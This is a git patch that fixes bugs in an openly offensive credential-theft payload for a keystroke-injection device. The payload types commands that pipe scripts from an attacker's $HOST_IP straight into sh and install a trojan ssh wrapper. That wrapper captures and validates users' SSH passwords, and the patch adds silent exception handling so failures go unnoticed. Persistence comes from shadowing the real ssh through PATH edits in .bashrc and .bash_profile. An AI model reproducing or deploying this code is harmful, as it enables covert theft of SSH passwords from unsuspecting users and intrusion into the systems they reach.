From 99e6b63f4215a55c56db175df287874382805bb5 Mon Sep 17 00:00:00 2001
From: Michael Weinstein <michael.weinstein@ucla.edu>
Date: Thu, 21 Sep 2017 01:34:02 -0700
Subject: [PATCH] Testing bug fixes

Windows line endings removed.  Grrrr.  WTF, microsoft?

Found and fixed bug caused by missing default ssh config files making the program index into a NoneType by checking to make sure there's data there before indexing in.

Added the blanket try/except block for silent failures.  Main cause of these appears to be very badly written (invalid) ssh commands.  This is probably the best behavior the program could have with these... just silently run them and let them fail normally.  Do not pass go, do not collect 200 passwords.
---
 .../darkCharlie/injector/darkCharlie.py       | 19 +++++++++-------
 .../darkCharlie/injector/payload.txt          | 22 ++++++++++++++++---
 .../credentials/darkCharlie/injector/post.sh  |  5 +++--
 .../credentials/darkCharlie/injector/pre.sh   |  2 +-
 4 files changed, 34 insertions(+), 14 deletions(-)

diff --git a/payloads/library/credentials/darkCharlie/injector/darkCharlie.py b/payloads/library/credentials/darkCharlie/injector/darkCharlie.py
index 7ea76f48..225b5dcc 100644
--- a/payloads/library/credentials/darkCharlie/injector/darkCharlie.py
+++ b/payloads/library/credentials/darkCharlie/injector/darkCharlie.py
@@ -322,7 +322,7 @@ def parseArguments():
     
 def findHostInLootConfigs(lootFileData, host):
     for fileHash in lootFileData["configFiles"]:
-        if host in lootFileData["configFiles"][fileHash]:
+        if lootFileData["configFiles"][fileHash] and host in lootFileData["configFiles"][fileHash]:  #have to check if there is even file data there, otherwise we end up indexing into nothing and failing hard
             return lootFileData["configFiles"][fileHash][host]
     return None
 
@@ -391,7 +391,7 @@ def shinyLetsBeBadGuys():
                 try:
                     password = lowDownDirtyDeceiver(userName, hostAddress)
                 except:
-                    password = FailedToObtain
+                    password = "FailedToObtain"
                     break
                 try:
                     gotValidPass = paramikoApprovesOfThisPassword(hostAddress, hostPort, userName, password)
@@ -402,11 +402,14 @@ def shinyLetsBeBadGuys():
     
 if __name__ == '__main__':
     import os
-    args = parseArguments()
-    intendedCommand = args[:]
-    intendedCommand[0] = originalSSHExecutable
-    intendedCommand = " ".join(intendedCommand)
-    if len(args) > 1:
-        shinyLetsBeBadGuys()
+    try:
+        args = parseArguments()
+        intendedCommand = args[:]
+        intendedCommand[0] = originalSSHExecutable
+        intendedCommand = " ".join(intendedCommand)
+        if len(args) > 1:
+            shinyLetsBeBadGuys()
+    except: #I really feel weird doing a massive open-ended exception here... but silence
+        pass
     os.system(intendedCommand)
     quit()
\ No newline at end of file
diff --git a/payloads/library/credentials/darkCharlie/injector/payload.txt b/payloads/library/credentials/darkCharlie/injector/payload.txt
index a59c6d07..3da8b92b 100644
--- a/payloads/library/credentials/darkCharlie/injector/payload.txt
+++ b/payloads/library/credentials/darkCharlie/injector/payload.txt
@@ -60,20 +60,36 @@ QUACK DELAY 2000
 if [ "$mac" = true ]
 then
     QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
+    QUACK ENTER
+    QUACK DELAY 200
     QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh
+    QUACK ENTER
+    QUACK DELAY 200
     QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
+    QUACK ENTER
+    QUACK DELAY 200
     QUACK STRING ~/.config/ssh/ssh --initializeScript
+    QUACK ENTER
+    QUACK DELAY 200
 else
     QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh  #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT 
-    QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh  #Will test this on a mac when I finish up
+    QUACK ENTER
+    QUACK DELAY 200
+    QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh"  #Will test this on a mac when I finish up
+    QUACK ENTER
+    QUACK DELAY 200
     QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
-    QUACK STRING ~/.config/ssh/ssh --initializeScript
+    QUACK ENTER
+    QUACK DELAY 200
+    QUACK STRING python "~/.config/ssh/ssh" --initializeScript
+    QUACK ENTER
+    QUACK DELAY 200
 fi
 
 QUACK DELAY 200
 QUACK ENTER
 QUACK DELAY 200
-QUACK STRING exit
+#QUACK STRING exit
 QUACK DELAY 200
 QUACK ENTER
 LED SUCCESS  #The Dungeons and Dragons tattoo hath rolled a 20
diff --git a/payloads/library/credentials/darkCharlie/injector/post.sh b/payloads/library/credentials/darkCharlie/injector/post.sh
index bff63547..ab7f2980 100644
--- a/payloads/library/credentials/darkCharlie/injector/post.sh
+++ b/payloads/library/credentials/darkCharlie/injector/post.sh
@@ -1,9 +1,10 @@
 #!/bin/bash
 
-chmod u+x ~/.config/sudo/sudo
+chmod u+x ~/.config/ssh/ssh
 if [ -f ~/.bash_profile ]
 then
     echo "export PATH=~/.config/ssh:$PATH" >> ~/.bash_profile
 else
     echo "export PATH=~/.config/ssh:$PATH" >> ~/.bashrc
-fi
\ No newline at end of file
+fi
+
diff --git a/payloads/library/credentials/darkCharlie/injector/pre.sh b/payloads/library/credentials/darkCharlie/injector/pre.sh
index 06431c18..27e9a96e 100644
--- a/payloads/library/credentials/darkCharlie/injector/pre.sh
+++ b/payloads/library/credentials/darkCharlie/injector/pre.sh
@@ -8,4 +8,4 @@ fi
 if [ -f  ~/.config/ssh/ssh ]
 then
     rm  ~/.config/ssh/ssh
-fi
\ No newline at end of file
+fi